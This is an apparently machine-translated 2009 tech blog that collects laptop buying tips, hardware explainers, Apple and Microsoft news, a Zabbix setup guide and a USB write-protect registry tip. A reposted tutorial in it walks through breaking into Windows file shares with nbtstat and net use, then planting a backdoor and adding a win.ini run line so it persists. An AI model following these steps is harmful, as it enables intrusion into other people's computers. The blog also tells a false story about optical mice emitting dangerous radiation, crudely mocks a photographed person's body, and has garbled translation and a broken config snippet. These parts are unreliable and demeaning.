Tips select Laptop or Notebook

Jumat, 16 Januari 2009

The most major

The main, we must determine the notebook will be what we used to? Applications or programs that will be what we often use? Do you often take our journey? Do you have specific needs that?

General Guide
You need some basic guidelines to start the search. What is the value of the money that you budget? What is the screen size you want?

Specific guidelines
Specifications notebook / laptop is how that fits your needs? Should I wait for better or buy now?
After you answer a few questions this, your search will be easier because of the choice to be more specific.

Applications will be what you use?
If you play 3D games or using applications such as 3D CAD, you need a notebook with a dedicated VGA memory (non-shared). Conversely, if you do not use a 3D application or game, then choose a laptop with the integrated VGA memory (integrated VGA memory). Notebok with the VGA memory sparing more integrated battery and cheaper.

What you will often take them?
If so, the size and weight of a key factor for the decision. Laptop has a screen size varies 15.4 ", 14.1", 13.3 ", 12.1" to 8 "and very heavy influence. Laptop screen with 15.4 "has a weight of 2.9 kg, 14.1" around 2.3kg, 13.3 "around 2.1kg, 12.1" around 1.9kg. However, the small laptop, usually the price will be more expensive too.

If you use the laptop will often dijalan, where you will find it difficult to fill the power source battery, consider the resistance battery.
If you do not often bring you travel notebook, notebook with a larger screen can be an option. Notebook with a screen 17 "VGA is usually equipped with a sophisticated, high-resolution screen and a good variety of features.

Have special needs?
Are there any criteria or special needs that you buy in a notebook? Make sure that your needs met before determining the options. Are there any additional equipment or accessories that you connect to your notebook? Check whether you have the choice of notebook port input / output accordingly.

How much of your budget?
Your budget will determine some things. Even if the notebook is offered with a cheaper price, essentially you will be in accordance with how much you pay. Many offer the cheapest laptop from under 5 million, to over 20 million. There is more to offer cheaper prices and there is also a vice-versa.
Make notebook with the performance of the material or using high-quality high-cost needs to make the expensive and the price is expensive notebook. Laptops are offered with a cheap price, often using components that lower the quality.

What type of screen, the size and resolution?
Determining the appropriate screen is important. This is the notebook that you use most often. Make sure you select the most appropriate to your needs.

Wide LCD screen, 16:9, currently dominate the market, along with a glossy screen model. The glossy screen seem more bright, clear, sharp and kontrasnya better. But it also makes the eyes get tired more quickly if used for a long period of time.

Choosing the right size is also important. The screen is small, better suited to take on the go. The big screen more suitable for users who rarely travel.

Resolution determines how much of the desktop. High-resolution desktop space to provide a larger, on the other hand icon and the note appears to be smaller. But we can still change the screen resolution and size of any posts.

Specification

Processor
Intel vs. AMD?
A lot of debate about the second company. But in fact the two companies is the best processors in the world and race each other to develop the type of processor best. Currently, Intel processors for notebook, have better technology to save battery. But most users will not encounter any difficulty brand prosesor. Because there is no difference in performance between the two light. Notebooks with AMD processors are usually cheaper price.

Technology, the latest Intel Mobile Processor
• Pentium M (Dothan) - Used in noteboook produced around 2004. This technology is made specifically for use in notebook and power needs to operate with a smaller and more cold than the preceding.
• Celeron M (Dothan and Yonah) - single-core processor (one core) is cheap, according to the most basic applications, such as office and graphics. But not able to support the weight of the application.
• Core Solo (Yonah) - Processor cheap structure made from the Core Duo, but has only 1 active core CPU. Core Solo replace the Pentium M in 2006.
• Core Duo (Yonah) - dual-core technology (two core) first from Intel. Core Duo (32-bit) to make 2 on 1 CPU processor without increasing power consumption.
• Core 2 Duo (Merom) - 64-bit version of the Core Duo, slightly better performance from the Core Duo and can run Windows Vista and 64-bit applications other.

AMD's latest mobile processors
• Sempron - Processor 1 core low in the old notebook. As a replacement of the Athlon. The latest version supports 64-bit applications.
• Turion 64 - Processor 1 core, 64-bit with a power consumption is lower than the Sempron
• Turion 64 x2 - Dual Core version, from 64-bit Turion

GPU
Nvidia vs. ATI?
This debate is a topic that is also popular. They both produce a good graphics card. Nvidia better in OpenGL technology and support Linux. While ATI has better ability in the game, anti-aliasing and anisotropic filtering. There are no differences between them be.

Most important you know how big the program needs to use your graphics card. If you use a 3D application or game that weight, you'll need a VGA with a dedicated high performance. If not, VGA Intel GMA 900/950 that already more than enough

RAM
Of all the components in the notebook, the amount of RAM installed will have the most obvious effect. The large RAM, the faster all the applications will run. Currently, the minimum is 512MB, and is recommended you have a 1GB, especially if you're running Windows Vista. If you run multiple applications simultaneously (multitasking), you need to take to upgrade to 2GB.
There is no different between 533MHz and 667MHz.
RAM is also one of the most prominent component in the upgrade, you can even do it yourself.

Hard Drive
How much storage space you need? Do you plan to store lots of files, music, video or photos? If so, you need the capacity Harddisk greater. But if you have limited funds, buy external hard drive will be cheaper and can be an option.

Optical Drive
Currently, almost all laptops are equipped with DVD writer, which can also function as a CD writer, DVD reader and CD reader.

Wireless
When all this laptop is also equipped with wireless technology. Most of the notebook is equipped with Intel PROSET 3945 802.11 a / b / g wireless card.

Battery
If you plan to frequently use your laptop without a drive in the power cable to the charger, you need enough capacity battery. Currently, the average notebook battery is able to stand around 2-3 hours.

How do I choose the warranty?
Some notebook vendors already offer the extended warranty period with a relatively affordable price. If you want to use the notebook for the long term, there is no one to consider buying a warranty extension with prices ranging between 5-10% price notebook.

Buy now or wait?
Notebook technology has changed continuously. Always there will be a technology that is faster or higher. And this can not be avoided.
So when you need a notebook at this time, make sure that the technology that is capable enough to meet your needs. If your need is not urgent, you can wait.
But if you need urgent, still have the option to add exchange in the next days.
source : forum.anugrahpratama.com

Read more...

Most laptop Weight

Gateway MD Series design has a classic, with a black cover, and the silver strip at the seam. Gateway introduced a multimedia notebook PC MD Series, the power that has a processor from Intel or AMD, including 2Duo Core, AMD Athlon X2 and AMD Turion X2. MD Series laptop comes with 4GB RAM and 500GB hard drive, as well as graphic card ATI Mobility Radeon HD 3650. MD Gateway Series is also equipped with a 15.6 inch LCD display, resolution 1366 × 768 pixels, HDMI 1.3 output, Wi-Fi connection 802.11n, the Blu-ray drive and 1.3 megapixel webcam. MD Series dibandrol with the $ 649.99 price, plus facilities dual layer DVD burner.

Elegant design, the strength of a battery that is durable, a very big hard drive, the MD Series Notebook Gateway looks good, matches the price. However, the weight of my laptop MD Gateway Series is quite heavy, more of the weight of the notebook with a 15.4 inch display. In addition, the keyboard is' noisy 'performance and a lack of good graphic also one of the weaknesses MD Series Gateway notebook this.



Gateway laptop specs MD Series:
CPU: 2.0-GHz Intel Core 2 Duo T6400
Included RAM: 4GB
Upgradable to 4GB RAM
Hard Drive Size: 500GB
Hard Drive Speed: 5.400 rpm
Hard Drive Type: SATA Hard Drive
Optical Drive Type: DVD-RW Dual Layer
Optical Drive Speed: 8X
Display Size (inches): 15.6
Native Resolution: 1366x768
Graphics Card: Intel GMA 4500MHD
Video Memory: 1.7GB
Wi-Fi: 802.11b/g/n
Bluetooth
Operating System: MS Windows Vista Home Premium (64 bit)
Ports (excluding USB): Ethernet, HDMI, headphone, microphone, modem, VGA
U.S. B Ports: 4
Card Slot: 5-1 card reader; ExpressCard
Warranty / Support: One-year limited/24/7 toll-free phone
Size: 15.3 x 10.4 x 1.7 inches
Weight: 6.8 pounds (3 kg)

Read more...

Laptop

With the speed of rocket fame as a laptop computer is really a fenomenal. Laptops are easily carried, powernya smaller and a quiet voice. However, laptops often feel more slowly and have a graphical display that can still be considered less, also in the process of power, but the shortfalls are not affecting the users.

Laptops are more expensive from the PC Desktop.
How might all the equipment that we normally find on a PC desktop as much as it can be wrapped in such a way into one package? and how the laptop may be able to work from a battery of strength? let us through.

Overall laptop and a PC (Personal Computer) desktop is very similar. They have the basic hardware (hardware) the same, the operating system software and the same. The main difference is how the components tesebut packed with concise.

Load a desktop computer motherboards, video cards, hard drives and other components included in a large box. Monitor keyboard and other periperal connect cables and wireless. Both the box that stands vertically and horizontally, need more room for additional cards, cables and air circulation.

Because of different designs, and capabilities in mobility component must have a laptop requirement:
Abridged to be in a small space.
Save energy
Heat from the smaller components on the computer desktop.

Often, this is the difference between the components to make a little more expensive, which could make prices more expensive laptop.

Processors
Microprosesor, or CPU, to work with the operating system to control to control the computer. This is the main, pro-brain acts as the computer. CPU high heat, then use a desktop computer fan for air circulation and peredam hot plate, a plate that is arranged in such a way to transfer heat from the processor. Because since laptops have far less space and have a more concise method for placing components peredam this summer, the CPU is usually:

Working on voltasi and a low clock speed, this reduces the discharge of heat and excessive but will be slightly slow processor performance. Many also run a laptop that is installed on the voltage and clock speed is higher, but still use the settings in a lower battery consumption.

Installation of the motherboard without a pin, pin socket, and require more space on the PC. Some of the laptop processors is installed directly on the motherboard without using the socket. There was also a laptop that uses a Micro-FCBGA (Flip Chip Ball Grid Array), which uses the ball as a replacement pin. This design saves space, but in this case means that the processor can not be released from the motherboard to be replaced or upgraded.

Having sleap mode or slow-down mode, the computer operating system and will work together to reduce the speed when the computer is not being used or not the processor is not doing the work. Apple G4 processor property also prioritize this to save battery power.

Some use laptop components of the desktop CPU set to work on the clock speed is lower. Although this may improve performance, but the laptop is often run with the excessive heat and segnifikan battery life.

In general, all have a laptop and a small fan reducer hot plate, pipe or heat spreader to help remove heat from the CPU. Some laptop models hi-end, to reduce the CPU heat using liquid refrigerant that was distributed in addition to hot pipes. Also, most laptop CPUs are the edge laptop. This allows the fan to move the heat out through laptop without other components.

Memory and Storage
A laptop memory influence the performance of speed laptop. some laptops have cache memory that are placed close to the processor, this allows akeses data faster. Some channels also have a larger buss, allows data to move from the processor to the motherboard with more quickly.

Laptops often use smaller memory modules to summarize space. Momory type used in laptop include:
Small Outline Dual Inline Memory Module (SODIMM)
Dual Data Rate Synchronous RAM (DDR SDRAM)
Single data rate Synchronous RAM (SDRAM) memory module laptop
Some laptops have a memory that is easy to upgrade and easy for the panel released.

Just like a desktop, laptop hard drives have internal, which is used to store the operating system, applications and data files. However, laptops usually have a few hard-disk space than the desktop PC. Hardisk a laptop, of course, is also physically smaller than the property of the PC desktop. In addition, performance on the laptop hard drives to revolve more slowly from the hard drive on the PC desktop, it is better to reduce the heat and use the battery.

Desktop space that has been enough to drive additional, such as DVD drives and CD ROM. Although the space on the laptop is very small but many use a laptop port modular design, which can be paired in the same place, it has three different goals:

Hot swappable - computer still running while doing pengantian drive.
Warm swappable - while still running a computer drive change, but the adjustment drive (the flow of data to use the processor) must be non-aktip
Cold swappable - the computer must be turned off during a transfer.

In some cases the drive port is not used for a drive, but can also be used as an extra battery.

Display and Sound
Pemproses a graphics unit (GPU) is a microprosesor handle the processing / calculations important in 3D graphics. As the processor CPU, a GPU high heat. Most laptops have built-in graphics on motherboardnya or have a graphics card designed specifically for small laptop. GPU manufacturers like ATI and Nvidia, both specific to produce GPU laptop. Laptops often share memory between the CPU and GPU, in order to save space and battery.

Many people consider that less than the laptop's performance grafisnya. Laptops have a lot of resources to the process of productivity applications and web surfing. However, the laptop must be struggling to overcome the latest 3D games. Only a few laptops specifically designed for game fans, have a more powerful GPU and additional video memory.

Most use a laptop screen LCD screen. Most people use the screen size between 12 and 17 inches, and the size of the screen affect the overall size of laptop. In addition, the laptop screen include:
Black-and-white (16 grayscale) or color (65,536 colors)
Or passive matrix aktip
Reflective or backlit

matrix screen aktip issued a sharp picture and is easier to read, backlit display and a better use for the poor light conditions.

Most laptops also have a sound card itself and the terintergrasi on the motherboard, as well as speakernya the built-in. However, very rarely has a quality laptop Soundcard and spiker as on the PC desktop. The audio fans and gamers can add the ability to add their laptop spiker external ditancapkan through the USB port or FireWire port on the laptop.

Power Supply
Laptop and desktop using the same electricity. Both have the same small battery to maintain the accuracy of the time, and in some cases is called the CMOS RAM. However, unlike desktop computers, laptop easier and can be taken with a battery operated.

Battery Nickel-Cadmium (NiCad) battery type is first used in a laptop computer, laptop and laptop-type long and sometimes still use the battery. The period of the battery charge is approximately two hours, but may be less depending on the memory effect. Gas bubbles in the platinum cells, reduce the total number of cell space available for a recharge. That can be recommended on the matter it is not recharge the battery before completely empty. The lack of a NiCad battery is charged when too long, can explode.

Battery Nickel-Metal Hydride (NiMH) is a bridge between NiCad battery and battery Lithium-Ion (LiIon) is the latest. NiMH have the charge longer than NiCad, but on the whole has a total period of active shorter.

LiIon battery is the standard for the latest laptop. The battery is lightweight and has a longer time. LiIon not rely on the memory effect, can be charged at random, and will not cause an effect in the summer when the charge is too long. LiIon batteries are much thinner than the battery-laptop battery that makes it ideal for notebook batteries are thin. LiIon battery can endure up to 950 times charge until 1200.

Many laptop using LiIon states have active period of 5 hours, but the size can be very dependent on how computers are used. Hard Drive, Disk Drive and LCD screen, all the objects using battery power. Even the use of wireless internet connections also require a battery power. Many models have a laptop power management software to extend the period of active or battery conserve battery power when the battery is running low.

Whitebooks
Many people make a PC for their own use or for customers. Home-made machine is called Whiteboxes (white box), which provides a significant portion of the market for computers. Some people also modify their computers to do, which is called "modding". but how to create or modify a laptop?

laptop or home-made modifications called white book (whitebook). Whitebook play the role of 5% in the laptop market and the number is slowly increasing. Industry has been running fairly well in mepertahankan number of laptop users. They make a laptop is quite difficult to be opened, modified and get onderdil2 laptop. Opening the chassis in the case of most laptops making factory warranty does not apply.

Make a laptop from the beginning is still quite difficult, because it is not easy to get a laptop devices. But vendors such as vendor-ASUS and ECS ease some of its customers to buy the framework - the framework laptop empty. Frame-frame is sold especially for resellers who want to make Whitebook and sell them to customers. In addition, we can modify or mengup-grade using the framework. Companies such as TechStyle business has made it.

Parts of the laptop Whitebook consists of:
Chassis
Motherboard
Optical drives
Screen display
Keyboard
Graphics Card
This means that you want to build for whitebook should explore:
Microprocessor
RAM
Wireless card

On this, there is no real standard for the form factor design (design and shape) of the laptop components. Processor designed specifically for laptop dipasaran very much, but the search in accordance with the motherboard is another story. For devices drivenya hard enough standard, and system memory SODIMM easily searchable, but for the other components still need more in the search.

source : hi-technews.net

Read more...

Danger Mouse Use the Back Optic

Optic mouse, may have been a lot of computer users who already use these small objects. But, you know that the mouse optic can give side effects to the users?

When using the optic mouse, users would feel more comfortable using a shortcut rather than directly from the keyboard. However, the convenience of mouse optic also carry side effects that can be dangerous to the user. Approximately since the three years after the first optic dirilisnya mouse by Microsoft, has found that there are thousands of cases of deviation on the network as a result of the radiation emanated optic mouse. Working with the mouse optic elektromagnetik emit high frequency waves to the surface below. Frequency that is used more than the mobile phone.

Many users may already know, that the hands and feet is the center-edge end of the nerve body. Therefore, the radiation from the mouse can be felt in the hands and can affect the user's health. According to observations from the world health agency, WHO, the mouse equivalent of radiation 5 times mobile phone radiation, and will be more dangerous if the mouse optic held constantly by computer users.

For mouse optic product quality is low, the influence of radiation elektromagnetik will feel better. This is due to have a good product to use protective (shield) in order to protect the mouse optic wrist. Because of the danger that this is quite worrying, large companies such as WHO, Greenpeace, and CNN have stopped the use of optical mice for all activities in the office. Meanwhile, for Microsoft and IBM have been working together for mutual pointer making the device more secure, with the fund about $ 2 billion.

For that, users can get started using the mouse only when needed, and could be more practice using the keyboard shortcut, such as "Ctrl-V to paste, and so forth.

source : beritanet.com

Read more...

Steve Jobs of Apple will Leave

 
Apple CEO, Steve Jobs, Wednesday, said Apple will leave because of the health complex. Jobs said that he aka off until June, and COO Tim Cook will replace it as the CEO of Apple. Jobs this announcement after a letter from Jobs published last week, the contents because of hormone imbalance in the rubuhnya making excessive loss of body weight. In the letter, Jobs said his side will undergo treatment.



In the last five months, Jobs acknowledged that the health condition more serious than ever before. In 2004, Jobs even have to undergo surgery. "According to me, Jobs has been doing everything to shareholder and Apple, which may not be done by others. Let it rest and he will be back when he can. "Says Guy Kawasaki, one of Apple Evangelist.

Although Jobs has known health problems, both Jobs and Apple does not mention exactly what the disease is being prey Jobs. Many observers are concerned that due to Apple will replace the 'left' Steve Jobs. However, an Analyst Gene Munster of Piper Jaffray, said that even without Jobs, Apple will still be running the inovasinya. Unlike the Roger Kay, Endpoint Technologies Analyst saying that Apple would have the effect, if Jobs left Apple.

"Whatever health Steve, Steve, but also bring 'soul' of Apple. So the question, how Apple product development process will work, after Jobs out of the process? "Said Kay.

source : beritanet.com

Read more...

what you think about this image?




An Apple fan was caught showing Bill and the rest of Microsoft what he/she thinks of the company. I use he/she because I've spent the better part of fifteen minutes trying to figure out what sex that person is, and I still can't tell. Let's run through the photographic evidence. Long hair: Many dorky men in the computer industry have pony tails, so this is inconclusive. Tucked in t-shirt: Just as popular with both male and female virgins, so again, inconclusive. Possible earring: Looks like it may be a hoop, so leaning female, or very gay male. Lastly, Peeing like a dude, but no visible urine on sign: Likely indicates a female, or a male with penis so small the guy is lost in his own pubic hair and peeing into his hand. Conclusion: Dork. Likely virgin. Little or no penis.
UPDATE: I'm not making fun of Apple or Apple users, just the boob in the picture

source : geekologie.com

Read more...

Microsoft forged Collaboration Mac and Windows

Microsoft Corp. announced this week will release a new Macintosh software at the end of this year, which can facilitate users in Office 2008 Mac users can collaborate with the Office 2008 version of Windows. Microsoft to make the announcement at the Macworld Conference & Expo, where Apple Inc. participating for the first time without bringing Steve Jobs.


Document Collaboration Companion tester will release Office 2008 for Mac, is in beta. However, Microsoft will neither deadline date when the final release of the software, and only revealed that the software will be released at the end of this year. Microsoft spokesman says the program for the Mac Office 2008 will be easier for users to download and upload documents to enterprise servers, which run using SharePoint, a free online service or the Office Live workspace. Companion Document Collaboration also provides a Mac-based tool that allows users to share the Office for the document.



Microsoft will create a 'gang' of the software for the Mac Office 2008 for use in mail client. To that end, Microsoft Office 2008 will provide free, that will be the transition to the Exchange Web Services (EWS) to connect to the Exchange mail servers.

source : beritanet.com

Read more...

Exploiting File and Print Sharing

Rabu, 14 Januari 2009

I'm going to explain two ways of breaking into a Windows box that has file
sharing enabled. Just to see how unsafe Windows is, the programs you'll need
come with Windows. isn't that ironic? Okay, of course they come with Windows!
Would you actually expect Microsoft to release an OS that supports sharing
without the tools to access shares?
Now, of course, you can hack file and print sharing through Unix as well.
We'll get to that in the end. Right now we're dealing with Windows here.
Both ways will have equal starts but then in one of the ways you'll keep
typing commands, and in the other way you'll use a GUI (for the ppl who
don't know GUI stands for Graphical User Interface) software. The programs
that you need are called Nbtstat.exe and Net.exe you can find it in the windows
directory. These programs run from the MS-DOS prompt. To see the help menu
for nbtstat type nbtstat /? And for net type net /?. Now if you are using
Windows 95 you can have the option NetBios Over TCP/IP disabled and with
that disabled nbtstat won't work and will display a error message like this
one: "Failed to access NBT driver" without the quotes. So if this error
message comes up just go to the control panel, and select the network icon. Now
select TCP/IP and choose properties, in the TCP/IP properties box select the
NetBIOS sheet, and enable it checking the box that shouldn't have a cross. If
you have Windows 98 the error message shouldn't be displayed unless you have
some kind of a port blocker on port 139 (such as Nukenabber). A lot of people
have these things on to detect OOB nuke attempts (usually newbies that can't
use a firewall or lamers that never attempted to. Hopefully not you).
Now, you must be thinking that enabling NetBIOS over TCP/IP opens the same
three ports, that you use to access a computer. That's true, because if you
want to use the same protocol you'll need to use the same default ports, or
you can use a terminal emulator to connect to port 139 and instead of using
the application I mentioned to type the protocol commands, but that's a real
pain in the ass. Remember that there isn't any problem with the file sharing,
because you don't have it enabled, you've just got the ports open (you are
just vulnerable to the DoS attack, you can use a firewall or get a patch for
it at www.theargon.com (click on defenses and find the OOB patch), but I don't
know if that would block the incoming data from the host that you are trying
to get in).

Now that you have your NbtStat.exe ready to roll, choose the computer. You
can use the hostname or the IP but you need to use different switches (I'll get
to that in a second).
Let's suppose for a second that this computer's hostname is
Mycomputer.MyIsp.com and the IP is 194.65.34.3. The first thing you need to do
is to see if the computer has file sharing enabled. How can you do that? It's
easy. Type:
nbtstat -a hostname
In this case nbtstat -a Mycomputer.MyIsp.com, but if you want to use the IP
you need to type:
nbtstat -A IP
In this case nbtstat -A 194.65.34.3
That's strange because DOS isn't case sensitive... but that's how things work
(I guess that although DOS isn't case sensitive, this rule doesn't apply to
command parameters. Makes more sense than the opposite).
Now you might receive two different kinds of replies. One that just says
"Host Not Found". If you get this message, you can give up trying to access
the share part of that computer, because that computer hasn't got the NetBIOS
protocol enabled, or you mistyped the hostname or IP. On the other hand, if
you get a table with names, type of sharing and status, it might be your lucky
day! Now if you get this table you're half way in. But remember that
sometimes you will get that table but you will not be able to do anything
productive with it, because the computer won't be sharing anything.
The table should look something like the one that is below:

Name Type Status
-----------------------------------------------------------------------------
Host <20> UNIQUE Registered
Hostbug <00> GROUP Registered
Host machine <03> UNIQUE Registered


-----------------------------------------------------------------------------
If you want to access your own sharing table just type nbtstat -n

-----------------------------------------------------------------------------
The values in the brackets can be:
00 base computernames and workgroups, also in "*" queries
01 master browser, in magic __MSBROWSE__ cookie
03 messaging/alerter service; name of logged-in user <--- This one is cool too --- 20 resource-sharing "server service" name <--- Check this one --- 1B domain master-browser name 1C domain controller name 1E domain/workgroup master browser election announcement [?] ------------------------------------------------------------------------------- I'll talk about messaging/alert service later, if you want to read about it now, just scroll down until you find Messaging/Alert Service. ------------------------------------------------------------------------------- So if the value in the box is 20 (by the way, the values are displayed
in hex code) it means that there is sharing enabled. So now how can someone
get in? Easy. First you need to create an entry in your Lmhosts file (can be
found at c:\windows\Lmhosts. There is also an example file at
c:\windows\Lmhosts.sam. In Windows NT, these files can be found at
c:\WinNT\Lmhosts and c:\WinNT\Lmhosts.sam). If you don't have the Lmhosts file,
just create it. Read all the information in the sample file file below.

--- Lmhosts.sam file ---
# Copyright (c) 1993-1995 Microsoft Corp.
#
# This is a sample LMHOSTS file used by the Microsoft TCP/IP for Windows
# NT.
#
# This file contains the mappings of IP addresses to NT computernames
# (NetBIOS) names. Each entry should be kept on an individual line.
# The IP address should be placed in the first column followed by the
# corresponding computername. The address and the comptername
# should be separated by at least one space or tab. The "#" character
# is generally used to denote the start of a comment (see the exceptions
# below).
#
# This file is compatible with Microsoft LAN Manager 2.x TCP/IP lmhosts
# files and offers the following extensions:
#
# #PRE
# #DOM:
# #INCLUDE
# #BEGIN_ALTERNATE
# #END_ALTERNATE
# \0xnn (non-printing character support)
#
# Following any entry in the file with the characters "#PRE" will cause
# the entry to be preloaded into the name cache. By default, entries are
# not preloaded, but are parsed only after dynamic name resolution fails.
#
# Following an entry with the "#DOM:" tag will associate the
# entry with the domain specified by . This affects how the
# browser and logon services behave in TCP/IP environments. To preload
# the host name associated with #DOM entry, it is necessary to also add a
# #PRE to the line. The is always preloaded although it will not
# be shown when the name cache is viewed.
#
# Specifying "#INCLUDE " will force the RFC NetBIOS (NBT)
# software to seek the specified and parse it as if it were
# local. is generally a UNC-based name, allowing a
# centralized lmhosts file to be maintained on a server.
# It is ALWAYS necessary to provide a mapping for the IP address of the
# server prior to the #INCLUDE. This mapping must use the #PRE directive.
# In addtion the share "public" in the example below must be in the
# LanManServer list of "NullSessionShares" in order for client machines to
# be able to read the lmhosts file successfully. This key is under
#
\machine\system\currentcontrolset\services\lanmanserver\parameters\nullsessionshares
# in the registry. Simply add "public" to the list found there.
#
# The #BEGIN_ and #END_ALTERNATE keywords allow multiple #INCLUDE
# statements to be grouped together. Any single successful include
# will cause the group to succeed.
#
# Finally, non-printing characters can be embedded in mappings by
# first surrounding the NetBIOS name in quotations, then using the
# \0xnn notation to specify a hex value for a non-printing character.
#
# The following example illustrates all of these extensions:
#
# 102.54.94.97 rhino #PRE #DOM:networking #net group's DC
# 102.54.94.102 "appname \0x14" #special app server
# 102.54.94.123 popular #PRE #source server
# 102.54.94.117 localsrv #PRE #needed for the
include
#
# #BEGIN_ALTERNATE
# #INCLUDE \\localsrv\public\lmhosts
# #INCLUDE \\rhino\public\lmhosts
# #END_ALTERNATE
#
# In the above example, the "appname" server contains a special
# character in its name, the "popular" and "localsrv" server names are
# preloaded, and the "rhino" server name is specified so it can be used
# to later #INCLUDE a centrally maintained lmhosts file if the "localsrv"
# system is unavailable.
#
# Note that the whole file is parsed including comments on each lookup,
# so keeping the number of comments to a minimum will improve performance.
# Therefore it is not advisable to simply add lmhosts file entries onto the
# end of this file.

To create an entry just open the Lmhosts file in your favorite word
processor and enter your target's IP, press tab and enter the share name
(the one that is listed in the name field). Save the file and exit.
Now the are two methods to access the remote shares you're after: the
easy way and the cool way.

--- The easy way (GUI) ---

If you don't want to have any more trouble just press start, click find
and select find computer. Enter the target's IP address. If your Lmhosts entry
is correct, it will show the computer you want in the search window. Just click
on the computer icon, and start browsing through that computer like you were
browsing your own computer.

--- The cool way ---

Now it's time to get to know the net.exe program. To access the help menu
just type:
net /? (in a dos Window).
I suggest to redirect all the help to a file and then read it
(use net /? > somefile.txt to redirect all output to somefile.txt and overwrite
it, or net /? >> somefile.txt to append the output to the file without deleting
it). You can also do net option /? to get more help about that option. To
access the share, you create a virtual drive that will be the share in the
other host.
In order to do this you will need to enter:
net use drive \\[ipaddress]\[sharename]

Where:

- drive is the drive letter you want. For example f: g: z:
- ipaddress is the target host's IP

- sharename is the name of the share (remember the table we discussed about
before?)

After doing this you just need to type drive: and then browse the new drive
using Ms-DOS like if you were in your own hard disk (for example, type:
f:
If your new virtual drive has been assigned the letter f).

Example:

Lets say that you coded a *really cool* backdoor, and you want to run on a
computer that has share enabled, the share name is Flintstone and the ipaddress
is 145.42.23.14 .

c:\>net use f: \\145.42.23.14\Flinstone

Now you would just need to copy the backdoor to the new virtual
drive.

c:\>copy backdoor.exe f:\backdoor.exe

----- First Version Text ------

Then you would just change drive and run the backdoor.

c:\>f:
f:\>backdoor.exe

And the backdoor is loaded, so now you can use it to access this computer.

--------------------------------
I'm deeply sorry, but what is written between the ----First Version Text---
is wrong.
Using what is there what probably would happen was installing the backdoor
in your own computer and not in the target host. Thanks to Kimmo from the
a-Men Group that correct me.
What you really need to do is to copy the backdoor.exe file to the share,
and then edit the win.ini file adding the line:

run=%SystemRoot%\backdoor.exe

---------------------------------------------------------------------------------
NOTE: Why %SystemRoot% ?
We need to use %SystemRoot% instead of F:, because F: is a virtual drive so
in the the host that drive could not exist, so you use the variable
%SystemRoot% that will return the correct drice.
---------------------------------------------------------------------------------

Of course, you can also put the backdoor in other places, such as
c:\windows\winstart.bat (enter the line %SystemRoot%\backdoor.exe as a new
blank line). If there is no such file, create it.

-----------------------
Messaging/Alert Service
-----------------------

What's this feature? It doesn't let you access the files for certain, but
it's kinda fun, because what it does is send a message, in Message Box Format
to the other host. Watch the face of the guy that is on the computer when he
sees a message box saying "Error: User To Stupid". However, you need to
remember that your host will be shown in the message box, but if you spoof your
host, you can have a good laugh with this.
When using this feature you also need to create a new entry in your Lmhosts
file. Remember that this can only be used in a LAN network such as a school LAN
with your friends, just to see their faces, nothing more. Even if you wanted to
send it over the Internet you couldn't because it uses a broadcast system, and
when any broadcasted packets get to a router they are immediately deleted
(security reasons. Off the topic of this tutorial).
To send a message to the other computer that computer needs to have a <03>
value. As you can see in the table somewhere in the middle of the file, <03
says:
03 messaging/alerter service; name of logged-in user <--- This one is cool
too ---
So if your target computer has this turned on you can send a message by
typing:
net send sharename message
If you are in an LAN and don't want people to mess with you, type:
net stop messenger
Doing this you stop the msg service, so you won't be able to send or receive
messages using the net send syntax. If you want to enable it again, type:
net start messenger
Now you'll be able to send and receive messages again.

http://blacksun.box.sk

Read more...

free software used for monitoring network

Selasa, 13 Januari 2009

Zabbix is one of the free-software used for monitoring network also all infra-structure in it. Suppose network traffic, the BW, network conditions, and so forth. We use the excess zabbix is:

• Real-time monitoring
• Providing such as visualization and graphics map
• Provide information to the problem quickly, eg by e-mail or sms.
• Selection type and condition reports misalkan per sunday, with only display data without the graphics, etc.
• Flexibel
• Can monitoring in a large group or only 1 host
• Security authentifikasi with the IP address
• Easy in the administration
• All information about zabbix can be obtained online
• Can be used for multi-OS
• etc.


Before the installation we do the first installation of the package that will be used to run zabbix, following a tough-software package that must be installed before or on the installation and running zabbix:

• apache2
• libapache2-mod-PHP5
• PHP5
• PHP5-gd
• PHP5-mysql
• PHP5-cli
• PHP5-SNMP
• mysql-server

STEP - STEP
1. Installation
• Make sure that the packages softawe with zabbix the dependency on the already installed
• In debian etch packages zabbix needed already so we do not need to download (zabbix-v1.1.4-1)
• Packages that are required are: zabbix-agent, zabbix-frontend-php, zabbix-mysql (using the mysql database).
# Apt-get install zabbix-agent zabbix-fronted-php-mysql zabbix

• Make connections with the database
# Mysql-u-p
password:
mysql> create database zabbix;
mysql> quit;


• Copy this configuration to mysql
# Cd /usr/share/zabbix-server
# Cat schema.sql | mysql-u-p zabbix
# Cat data.sql | mysql-u-p zabbix
• Configuration / etc / services
zabbix_agent 10050/tcp
zabbix_trap 10051/tcp


• Configuration / etc / inetd.conf
zabbix_agent stream tcp nowait.3600 zabbix \ / opt / zabbix / bin / zabbix_agent

• Then run zabbix-server:
# /etc/init.d/zabbix-server start

• Check in / var / log / zabbix-server:
/var/log/zabbix-server/zabbix-server.log

2. Configuration with php
• Change the configuration of / etc / zabbix / dbconfig.php:
?>?>?>?>?>?>?>?>?>?>

• Copy  /etc/zabbix to /var/www:
# cp-R /etc/zabbix /var/www

• Then check in http://localhost/zabbix, make sure that the mysql-server, apache2 and zabbix-server already start

3. Configuring the zabbix web interface
This simple example beperapa from zabbix configuration that will be observed in the web interface (for more sophisticated or not it depends on the parameters we want to show what we want to observe the more complete the more dynamic and clear)

First to do if you want to create their own configuration, we have to login and change the permision read & write, and then go to the link configuration

• Create a new group
Configuration -> hosts -> (Choose) Host Groups -> Create Group
Then enter the name of the group will be monitored eg: router

• Then create a template
Configuration -> hosts -> (Choose) Templates -> Create Template
Then enter the name of the template eg: kondisi.router add to the group router

• Make the item you want observed
Configuration -> Items -> (Choose) Router (Template) -> New Item
Then give the name of the items observed such as CPU_usage

source : zulfanruri.com

Read more...

Block copy data from computer to flash or usbdisk

Senin, 12 Januari 2009

How to secure your computer (Windows XP) so that data can not be copied to do the flash as following

1. open regedit

2. HKEY_LOCALMACHINE \ SYSTEM \ CurrentControlSet \ Control

3. CONTROL in the folder, type -> Edit> New> Key the new folder name -> "StorageDevicePolicies"

4. "StorageDevicePolicies", type Edit> New> Dword (32-bit)

5. key is a new name: "WriteProtect"

6. Click 2x Key WriteProtect it, and so change the Value Data 1

7. Restart

To open a data protection that can be copied to the flash with the value in the key write protect to 1.

Read more...

FACEBOOK finance the war in GAZA?


